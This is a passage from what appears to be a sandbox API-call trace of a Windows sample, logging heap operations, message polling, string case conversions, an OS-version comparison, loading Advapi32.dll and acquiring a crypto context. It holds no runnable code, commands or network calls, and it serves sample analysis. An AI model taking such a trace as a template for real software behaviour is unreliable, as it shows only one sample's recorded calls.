HALPmcxz\\Desktop/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xb570006, dwReserved1=0xdab8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa55e0 [0163.529] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.530] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0163.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0163.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.531] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.532] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.532] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.532] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.532] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.533] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.533] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.533] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.533] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.534] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.534] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.535] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.535] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0163.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.536] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.536] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0163.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0163.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.536] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.536] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.536] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.536] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.536] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0163.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0163.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.537] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0163.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0163.541] 